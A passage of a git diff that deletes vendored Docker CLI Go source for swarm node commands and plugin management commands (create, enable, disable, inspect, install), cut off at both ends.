-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := listOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:     "ls [OPTIONS]",
-		Aliases: []string{"list"},
-		Short:   "List nodes in the swarm",
-		Args:    cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runList(dockerCli, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func runList(dockerCli *command.DockerCli, opts listOptions) error {
-	client := dockerCli.Client()
-	out := dockerCli.Out()
-	ctx := context.Background()
-
-	nodes, err := client.NodeList(
-		ctx,
-		types.NodeListOptions{Filters: opts.filter.Value()})
-	if err != nil {
-		return err
-	}
-
-	if len(nodes) > 0 && !opts.quiet {
-		// only non-empty nodes and not quiet, should we call /info api
-		info, err := client.Info(ctx)
-		if err != nil {
-			return err
-		}
-		printTable(out, nodes, info)
-	} else if !opts.quiet {
-		// no nodes and not quiet, print only one line with columns ID, HOSTNAME, ...
-		printTable(out, nodes, types.Info{})
-	} else {
-		printQuiet(out, nodes)
-	}
-
-	return nil
-}
-
-func printTable(out io.Writer, nodes []swarm.Node, info types.Info) {
-	writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0)
-
-	// Ignore flushing errors
-	defer writer.Flush()
-
-	fmt.Fprintf(writer, listItemFmt, "ID", "HOSTNAME", "STATUS", "AVAILABILITY", "MANAGER STATUS")
-	for _, node := range nodes {
-		name := node.Description.Hostname
-		availability := string(node.Spec.Availability)
-
-		reachability := ""
-		if node.ManagerStatus != nil {
-			if node.ManagerStatus.Leader {
-				reachability = "Leader"
-			} else {
-				reachability = string(node.ManagerStatus.Reachability)
-			}
-		}
-
-		ID := node.ID
-		if node.ID == info.Swarm.NodeID {
-			ID = ID + " *"
-		}
-
-		fmt.Fprintf(
-			writer,
-			listItemFmt,
-			ID,
-			name,
-			command.PrettyPrint(string(node.Status.State)),
-			command.PrettyPrint(availability),
-			command.PrettyPrint(reachability))
-	}
-}
-
-func printQuiet(out io.Writer, nodes []swarm.Node) {
-	for _, node := range nodes {
-		fmt.Fprintln(out, node.ID)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/opts.go b/vendor/github.com/docker/docker/cli/command/node/opts.go
deleted file mode 100644
index 7e6c55d487..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/opts.go
+++ /dev/null
@@ -1,60 +0,0 @@
-package node
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-)
-
-type nodeOptions struct {
-	annotations
-	role         string
-	availability string
-}
-
-type annotations struct {
-	name   string
-	labels opts.ListOpts
-}
-
-func newNodeOptions() *nodeOptions {
-	return &nodeOptions{
-		annotations: annotations{
-			labels: opts.NewListOpts(nil),
-		},
-	}
-}
-
-func (opts *nodeOptions) ToNodeSpec() (swarm.NodeSpec, error) {
-	var spec swarm.NodeSpec
-
-	spec.Annotations.Name = opts.annotations.name
-	spec.Annotations.Labels = runconfigopts.ConvertKVStringsToMap(opts.annotations.labels.GetAll())
-
-	switch swarm.NodeRole(strings.ToLower(opts.role)) {
-	case swarm.NodeRoleWorker:
-		spec.Role = swarm.NodeRoleWorker
-	case swarm.NodeRoleManager:
-		spec.Role = swarm.NodeRoleManager
-	case "":
-	default:
-		return swarm.NodeSpec{}, fmt.Errorf("invalid role %q, only worker and manager are supported", opts.role)
-	}
-
-	switch swarm.NodeAvailability(strings.ToLower(opts.availability)) {
-	case swarm.NodeAvailabilityActive:
-		spec.Availability = swarm.NodeAvailabilityActive
-	case swarm.NodeAvailabilityPause:
-		spec.Availability = swarm.NodeAvailabilityPause
-	case swarm.NodeAvailabilityDrain:
-		spec.Availability = swarm.NodeAvailabilityDrain
-	case "":
-	default:
-		return swarm.NodeSpec{}, fmt.Errorf("invalid availability %q, only active, pause and drain are supported", opts.availability)
-	}
-
-	return spec, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/promote.go b/vendor/github.com/docker/docker/cli/command/node/promote.go
deleted file mode 100644
index f47d783f4c..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/promote.go
+++ /dev/null
@@ -1,36 +0,0 @@
-package node
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-func newPromoteCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return &cobra.Command{
-		Use:   "promote NODE [NODE...]",
-		Short: "Promote one or more nodes to manager in the swarm",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runPromote(dockerCli, args)
-		},
-	}
-}
-
-func runPromote(dockerCli *command.DockerCli, nodes []string) error {
-	promote := func(node *swarm.Node) error {
-		if node.Spec.Role == swarm.NodeRoleManager {
-			fmt.Fprintf(dockerCli.Out(), "Node %s is already a manager.\n", node.ID)
-			return errNoRoleChange
-		}
-		node.Spec.Role = swarm.NodeRoleManager
-		return nil
-	}
-	success := func(nodeID string) {
-		fmt.Fprintf(dockerCli.Out(), "Node %s promoted to a manager in the swarm.\n", nodeID)
-	}
-	return updateNodes(dockerCli, nodes, promote, success)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/ps.go b/vendor/github.com/docker/docker/cli/command/node/ps.go
deleted file mode 100644
index a034721d24..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/ps.go
+++ /dev/null
@@ -1,93 +0,0 @@
-package node
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/idresolver"
-	"github.com/docker/docker/cli/command/task"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type psOptions struct {
-	nodeIDs   []string
-	noResolve bool
-	noTrunc   bool
-	filter    opts.FilterOpt
-}
-
-func newPsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := psOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "ps [OPTIONS] [NODE...]",
-		Short: "List tasks running on one or more nodes, defaults to current node",
-		Args:  cli.RequiresMinArgs(0),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.nodeIDs = []string{"self"}
-
-			if len(args) != 0 {
-				opts.nodeIDs = args
-			}
-
-			return runPs(dockerCli, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output")
-	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func runPs(dockerCli *command.DockerCli, opts psOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	var (
-		errs  []string
-		tasks []swarm.Task
-	)
-
-	for _, nodeID := range opts.nodeIDs {
-		nodeRef, err := Reference(ctx, client, nodeID)
-		if err != nil {
-			errs = append(errs, err.Error())
-			continue
-		}
-
-		node, _, err := client.NodeInspectWithRaw(ctx, nodeRef)
-		if err != nil {
-			errs = append(errs, err.Error())
-			continue
-		}
-
-		filter := opts.filter.Value()
-		filter.Add("node", node.ID)
-
-		nodeTasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter})
-		if err != nil {
-			errs = append(errs, err.Error())
-			continue
-		}
-
-		tasks = append(tasks, nodeTasks...)
-	}
-
-	if err := task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc); err != nil {
-		errs = append(errs, err.Error())
-	}
-
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/remove.go b/vendor/github.com/docker/docker/cli/command/node/remove.go
deleted file mode 100644
index 19b4a96631..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/remove.go
+++ /dev/null
@@ -1,56 +0,0 @@
-package node
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type removeOptions struct {
-	force bool
-}
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := removeOptions{}
-
-	cmd := &cobra.Command{
-		Use:     "rm [OPTIONS] NODE [NODE...]",
-		Aliases: []string{"remove"},
-		Short:   "Remove one or more nodes from the swarm",
-		Args:    cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runRemove(dockerCli, args, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Force remove a node from the swarm")
-	return cmd
-}
-
-func runRemove(dockerCli *command.DockerCli, args []string, opts removeOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	var errs []string
-
-	for _, nodeID := range args {
-		err := client.NodeRemove(ctx, nodeID, types.NodeRemoveOptions{Force: opts.force})
-		if err != nil {
-			errs = append(errs, err.Error())
-			continue
-		}
-		fmt.Fprintf(dockerCli.Out(), "%s\n", nodeID)
-	}
-
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/node/update.go b/vendor/github.com/docker/docker/cli/command/node/update.go
deleted file mode 100644
index 65339e138b..0000000000
--- a/vendor/github.com/docker/docker/cli/command/node/update.go
+++ /dev/null
@@ -1,121 +0,0 @@
-package node
-
-import (
-	"errors"
-	"fmt"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-	"golang.org/x/net/context"
-)
-
-var (
-	errNoRoleChange = errors.New("role was already set to the requested value")
-)
-
-func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	nodeOpts := newNodeOptions()
-
-	cmd := &cobra.Command{
-		Use:   "update [OPTIONS] NODE",
-		Short: "Update a node",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runUpdate(dockerCli, cmd.Flags(), args[0])
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVar(&nodeOpts.role, flagRole, "", "Role of the node (worker/manager)")
-	flags.StringVar(&nodeOpts.availability, flagAvailability, "", "Availability of the node (active/pause/drain)")
-	flags.Var(&nodeOpts.annotations.labels, flagLabelAdd, "Add or update a node label (key=value)")
-	labelKeys := opts.NewListOpts(nil)
-	flags.Var(&labelKeys, flagLabelRemove, "Remove a node label if exists")
-	return cmd
-}
-
-func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, nodeID string) error {
-	success := func(_ string) {
-		fmt.Fprintln(dockerCli.Out(), nodeID)
-	}
-	return updateNodes(dockerCli, []string{nodeID}, mergeNodeUpdate(flags), success)
-}
-
-func updateNodes(dockerCli *command.DockerCli, nodes []string, mergeNode func(node *swarm.Node) error, success func(nodeID string)) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	for _, nodeID := range nodes {
-		node, _, err := client.NodeInspectWithRaw(ctx, nodeID)
-		if err != nil {
-			return err
-		}
-
-		err = mergeNode(&node)
-		if err != nil {
-			if err == errNoRoleChange {
-				continue
-			}
-			return err
-		}
-		err = client.NodeUpdate(ctx, node.ID, node.Version, node.Spec)
-		if err != nil {
-			return err
-		}
-		success(nodeID)
-	}
-	return nil
-}
-
-func mergeNodeUpdate(flags *pflag.FlagSet) func(*swarm.Node) error {
-	return func(node *swarm.Node) error {
-		spec := &node.Spec
-
-		if flags.Changed(flagRole) {
-			str, err := flags.GetString(flagRole)
-			if err != nil {
-				return err
-			}
-			spec.Role = swarm.NodeRole(str)
-		}
-		if flags.Changed(flagAvailability) {
-			str, err := flags.GetString(flagAvailability)
-			if err != nil {
-				return err
-			}
-			spec.Availability = swarm.NodeAvailability(str)
-		}
-		if spec.Annotations.Labels == nil {
-			spec.Annotations.Labels = make(map[string]string)
-		}
-		if flags.Changed(flagLabelAdd) {
-			labels := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll()
-			for k, v := range runconfigopts.ConvertKVStringsToMap(labels) {
-				spec.Annotations.Labels[k] = v
-			}
-		}
-		if flags.Changed(flagLabelRemove) {
-			keys := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll()
-			for _, k := range keys {
-				// if a key doesn't exist, fail the command explicitly
-				if _, exists := spec.Annotations.Labels[k]; !exists {
-					return fmt.Errorf("key %s doesn't exist in node's labels", k)
-				}
-				delete(spec.Annotations.Labels, k)
-			}
-		}
-		return nil
-	}
-}
-
-const (
-	flagRole         = "role"
-	flagAvailability = "availability"
-	flagLabelAdd     = "label-add"
-	flagLabelRemove  = "label-rm"
-)
diff --git a/vendor/github.com/docker/docker/cli/command/out.go b/vendor/github.com/docker/docker/cli/command/out.go
deleted file mode 100644
index 85718d7acd..0000000000
--- a/vendor/github.com/docker/docker/cli/command/out.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package command
-
-import (
-	"io"
-	"os"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/pkg/term"
-)
-
-// OutStream is an output stream used by the DockerCli to write normal program
-// output.
-type OutStream struct {
-	out        io.Writer
-	fd         uintptr
-	isTerminal bool
-	state      *term.State
-}
-
-func (o *OutStream) Write(p []byte) (int, error) {
-	return o.out.Write(p)
-}
-
-// FD returns the file descriptor number for this stream
-func (o *OutStream) FD() uintptr {
-	return o.fd
-}
-
-// IsTerminal returns true if this stream is connected to a terminal
-func (o *OutStream) IsTerminal() bool {
-	return o.isTerminal
-}
-
-// SetRawTerminal sets raw mode on the output terminal
-func (o *OutStream) SetRawTerminal() (err error) {
-	if os.Getenv("NORAW") != "" || !o.isTerminal {
-		return nil
-	}
-	o.state, err = term.SetRawTerminalOutput(o.fd)
-	return err
-}
-
-// RestoreTerminal restores normal mode to the terminal
-func (o *OutStream) RestoreTerminal() {
-	if o.state != nil {
-		term.RestoreTerminal(o.fd, o.state)
-	}
-}
-
-// GetTtySize returns the height and width in characters of the tty
-func (o *OutStream) GetTtySize() (uint, uint) {
-	if !o.isTerminal {
-		return 0, 0
-	}
-	ws, err := term.GetWinsize(o.fd)
-	if err != nil {
-		logrus.Debugf("Error getting size: %s", err)
-		if ws == nil {
-			return 0, 0
-		}
-	}
-	return uint(ws.Height), uint(ws.Width)
-}
-
-// NewOutStream returns a new OutStream object from a Writer
-func NewOutStream(out io.Writer) *OutStream {
-	fd, isTerminal := term.GetFdInfo(out)
-	return &OutStream{out: out, fd: fd, isTerminal: isTerminal}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go b/vendor/github.com/docker/docker/cli/command/plugin/cmd.go
deleted file mode 100644
index 92c990a975..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/cmd.go
+++ /dev/null
@@ -1,31 +0,0 @@
-package plugin
-
-import (
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-// NewPluginCommand returns a cobra command for `plugin` subcommands
-func NewPluginCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "plugin",
-		Short: "Manage plugins",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-
-	cmd.AddCommand(
-		newDisableCommand(dockerCli),
-		newEnableCommand(dockerCli),
-		newInspectCommand(dockerCli),
-		newInstallCommand(dockerCli),
-		newListCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-		newSetCommand(dockerCli),
-		newPushCommand(dockerCli),
-		newCreateCommand(dockerCli),
-		newUpgradeCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/create.go b/vendor/github.com/docker/docker/cli/command/plugin/create.go
deleted file mode 100644
index 2aab1e9e4a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/create.go
+++ /dev/null
@@ -1,125 +0,0 @@
-package plugin
-
-import (
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/reference"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-// validateTag checks if the given repoName can be resolved.
-func validateTag(rawRepo string) error {
-	_, err := reference.ParseNamed(rawRepo)
-
-	return err
-}
-
-// validateConfig ensures that a valid config.json is available in the given path
-func validateConfig(path string) error {
-	dt, err := os.Open(filepath.Join(path, "config.json"))
-	if err != nil {
-		return err
-	}
-
-	m := types.PluginConfig{}
-	err = json.NewDecoder(dt).Decode(&m)
-	dt.Close()
-
-	return err
-}
-
-// validateContextDir validates the given dir and returns abs path on success.
-func validateContextDir(contextDir string) (string, error) {
-	absContextDir, err := filepath.Abs(contextDir)
-
-	stat, err := os.Lstat(absContextDir)
-	if err != nil {
-		return "", err
-	}
-
-	if !stat.IsDir() {
-		return "", fmt.Errorf("context must be a directory")
-	}
-
-	return absContextDir, nil
-}
-
-type pluginCreateOptions struct {
-	repoName string
-	context  string
-	compress bool
-}
-
-func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	options := pluginCreateOptions{}
-
-	cmd := &cobra.Command{
-		Use:   "create [OPTIONS] PLUGIN PLUGIN-DATA-DIR",
-		Short: "Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.",
-		Args:  cli.RequiresMinArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			options.repoName = args[0]
-			options.context = args[1]
-			return runCreate(dockerCli, options)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVar(&options.compress, "compress", false, "Compress the context using gzip")
-
-	return cmd
-}
-
-func runCreate(dockerCli *command.DockerCli, options pluginCreateOptions) error {
-	var (
-		createCtx io.ReadCloser
-		err       error
-	)
-
-	if err := validateTag(options.repoName); err != nil {
-		return err
-	}
-
-	absContextDir, err := validateContextDir(options.context)
-	if err != nil {
-		return err
-	}
-
-	if err := validateConfig(options.context); err != nil {
-		return err
-	}
-
-	compression := archive.Uncompressed
-	if options.compress {
-		logrus.Debugf("compression enabled")
-		compression = archive.Gzip
-	}
-
-	createCtx, err = archive.TarWithOptions(absContextDir, &archive.TarOptions{
-		Compression: compression,
-	})
-
-	if err != nil {
-		return err
-	}
-
-	ctx := context.Background()
-
-	createOptions := types.PluginCreateOptions{RepoName: options.repoName}
-	if err = dockerCli.Client().PluginCreate(ctx, createCtx, createOptions); err != nil {
-		return err
-	}
-	fmt.Fprintln(dockerCli.Out(), options.repoName)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/disable.go b/vendor/github.com/docker/docker/cli/command/plugin/disable.go
deleted file mode 100644
index 07b0ec2288..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/disable.go
+++ /dev/null
@@ -1,36 +0,0 @@
-package plugin
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-func newDisableCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var force bool
-
-	cmd := &cobra.Command{
-		Use:   "disable [OPTIONS] PLUGIN",
-		Short: "Disable a plugin",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runDisable(dockerCli, args[0], force)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&force, "force", "f", false, "Force the disable of an active plugin")
-	return cmd
-}
-
-func runDisable(dockerCli *command.DockerCli, name string, force bool) error {
-	if err := dockerCli.Client().PluginDisable(context.Background(), name, types.PluginDisableOptions{Force: force}); err != nil {
-		return err
-	}
-	fmt.Fprintln(dockerCli.Out(), name)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/enable.go b/vendor/github.com/docker/docker/cli/command/plugin/enable.go
deleted file mode 100644
index 77762f4024..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/enable.go
+++ /dev/null
@@ -1,47 +0,0 @@
-package plugin
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type enableOpts struct {
-	timeout int
-	name    string
-}
-
-func newEnableCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts enableOpts
-
-	cmd := &cobra.Command{
-		Use:   "enable [OPTIONS] PLUGIN",
-		Short: "Enable a plugin",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.name = args[0]
-			return runEnable(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.IntVar(&opts.timeout, "timeout", 0, "HTTP client timeout (in seconds)")
-	return cmd
-}
-
-func runEnable(dockerCli *command.DockerCli, opts *enableOpts) error {
-	name := opts.name
-	if opts.timeout < 0 {
-		return fmt.Errorf("negative timeout %d is invalid", opts.timeout)
-	}
-
-	if err := dockerCli.Client().PluginEnable(context.Background(), name, types.PluginEnableOptions{Timeout: opts.timeout}); err != nil {
-		return err
-	}
-	fmt.Fprintln(dockerCli.Out(), name)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go b/vendor/github.com/docker/docker/cli/command/plugin/inspect.go
deleted file mode 100644
index c2c7a0d6bc..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/inspect.go
+++ /dev/null
@@ -1,42 +0,0 @@
-package plugin
-
-import (
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type inspectOptions struct {
-	pluginNames []string
-	format      string
-}
-
-func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] PLUGIN [PLUGIN...]",
-		Short: "Display detailed information on one or more plugins",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.pluginNames = args
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-	getRef := func(ref string) (interface{}, []byte, error) {
-		return client.PluginInspectWithRaw(ctx, ref)
-	}
-
-	return inspect.Inspect(dockerCli.Out(), opts.pluginNames, opts.format, getRef)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/install.go b/vendor/github.com/docker/docker/cli/command/plugin/install.go
deleted file mode 100644
index 2c3170c54a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/install.go
+++ /dev/null
@@ -1,208 +0,0 @@
-package plugin
-
-import (
-	"bufio"
-	"errors"
-	"fmt"
-	"strings"
-
-	distreference "github.com/docker/distribution/reference"
-	"github.com/docker/docker/api/types"
-	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/image"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-	"golang.org/x/net/context"
-)
-
-type pluginOptions struct {
-	remote          string
-	localName       string
-	grantPerms      bool
-	disable         bool
-	args            []string
-	skipRemoteCheck bool
-}
-
-func loadPullFlags(opts *pluginOptions, flags *pflag.FlagSet) {
-	flags.BoolVar(&opts.grantPerms, "grant-all-permissions", false, "Grant all permissions necessary to run the plugin")
-	command.AddTrustedFlags(flags, true)
-}
-
-func newInstallCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var options pluginOptions
-	cmd := &cobra.Command{
-		Use:   "install [OPTIONS] PLUGIN [KEY=VALUE...]",
-		Short: "Install a plugin",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			options.remote = args[0]
-			if len(args) > 1 {
-				options.args = args[1:]
-			}
-			return runInstall(dockerCli, options)
-		},
-	}
-
-	flags := cmd.Flags()
-	loadPullFlags(&options, flags)
-	flags.BoolVar(&options.disable, "disable", false, "Do not enable the plugin on install")
-	flags.StringVar(&options.localName, "alias", "", "Local name for plugin")
-	return cmd
-}
-
-func getRepoIndexFromUnnormalizedRef(ref distreference.Named) (*registrytypes.IndexInfo, error) {
-	named, err := reference.ParseNamed(ref.Name())
-	if err != nil {
-		return nil, err
-	}
-
-	repoInfo, err := registry.ParseRepositoryInfo(named)
-	if err != nil {
-		return nil, err
-	}
-
-	return repoInfo.Index, nil
-}
-
-type pluginRegistryService struct {
-	registry.Service
-}
-
-func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) {
-	repoInfo, err = s.Service.ResolveRepository(name)
-	if repoInfo != nil {
-		repoInfo.Class = "plugin"
-	}
-	return
-}
-
-func newRegistryService() registry.Service {
-	return pluginRegistryService{
-		Service: registry.NewService(registry.ServiceOptions{V2Only: true}),
-	}
-}
-
-func buildPullConfig(ctx context.Context, dockerCli *command.DockerCli, opts pluginOptions, cmdName string) (types.PluginInstallOptions, error) {
-	// Parse name using distribution reference package to support name
-	// containing both tag and digest. Names with both tag and digest
-	// will be treated by the daemon as a pull by digest with
-	// an alias for the tag (if no alias is provided).
-	ref, err := distreference.ParseNamed(opts.remote)
-	if err != nil {
-		return types.PluginInstallOptions{}, err
-	}
-
-	index, err := getRepoIndexFromUnnormalizedRef(ref)
-	if err != nil {
-		return types.PluginInstallOptions{}, err
-	}
-
-	repoInfoIndex, err := getRepoIndexFromUnnormalizedRef(ref)
-	if err != nil {
-		return types.PluginInstallOptions{}, err
-	}
-	remote := ref.String()
-
-	_, isCanonical := ref.(distreference.Canonical)
-	if command.IsTrusted() && !isCanonical {
-		var nt reference.NamedTagged
-		named, err := reference.ParseNamed(ref.Name())
-		if err != nil {
-			return types.PluginInstallOptions{}, err
-		}
-		if tagged, ok := ref.(distreference.Tagged); ok {
-			nt, err = reference.WithTag(named, tagged.Tag())
-			if err != nil {
-				return types.PluginInstallOptions{}, err
-			}
-		} else {
-			named = reference.WithDefaultTag(named)
-			nt = named.(reference.NamedTagged)
-		}
-
-		ctx := context.Background()
-		trusted, err := image.TrustedReference(ctx, dockerCli, nt, newRegistryService())
-		if err != nil {
-			return types.PluginInstallOptions{}, err
-		}
-		remote = trusted.String()
-	}
-
-	authConfig := command.ResolveAuthConfig(ctx, dockerCli, index)
-
-	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
-	if err != nil {
-		return types.PluginInstallOptions{}, err
-	}
-
-	registryAuthFunc := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfoIndex, cmdName)
-
-	options := types.PluginInstallOptions{
-		RegistryAuth:          encodedAuth,
-		RemoteRef:             remote,
-		Disabled:              opts.disable,
-		AcceptAllPermissions:  opts.grantPerms,
-		AcceptPermissionsFunc: acceptPrivileges(dockerCli, opts.remote),
-		// TODO: Rename PrivilegeFunc, it has nothing to do with privileges
-		PrivilegeFunc: registryAuthFunc,
-		Args:          opts.args,
-	}
-	return options, nil
-}
-
-func runInstall(dockerCli *command.DockerCli, opts pluginOptions) error {
-	var localName string
-	if opts.localName != "" {
-		aref, err := reference.ParseNamed(opts.localName)
-		if err != nil {
-			return err
-		}
-		aref = reference.WithDefaultTag(aref)
-		if _, ok := aref.(reference.NamedTagged); !ok {
-			return fmt.Errorf("invalid name: %s", opts.localName)
-		}
-		localName = aref.String()
-	}
-
-	ctx := context.Background()
-	options, err := buildPullConfig(ctx, dockerCli, opts, "plugin install")
-	if err != nil {
-		return err
-	}
-	responseBody, err := dockerCli.Client().PluginInstall(ctx, localName, options)
-	if err != nil {
-		if strings.Contains(err.Error(), "target is image") {
-			return errors.New(err.Error() + " - Use `docker image pull`")
-		}
-		return err
-	}
-	defer responseBody.Close()
-	if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil {
-		return err
-	}
-	fmt.Fprintf(dockerCli.Out(), "Installed plugin %s\n", opts.remote) // todo: return proper values from the API for this result
-	return nil
-}
-
-func acceptPrivileges(dockerCli *command.DockerCli, name string) func(privileges types.PluginPrivileges) (bool, error) {
-	return func(privileges types.PluginPrivileges) (bool, error) {
-		fmt.Fprintf(dockerCli.Out(), "Plugin %q is requesting the following privileges:\n", name)
-		for _, privilege := range privileges {
-			fmt.Fprintf(dockerCli.Out(), " - %s: %v\n", privilege.Name, privilege.Value)
-		}
-
-		fmt.Fprint(dockerCli.Out(), "Do you grant the above permissions? [y/N] ")
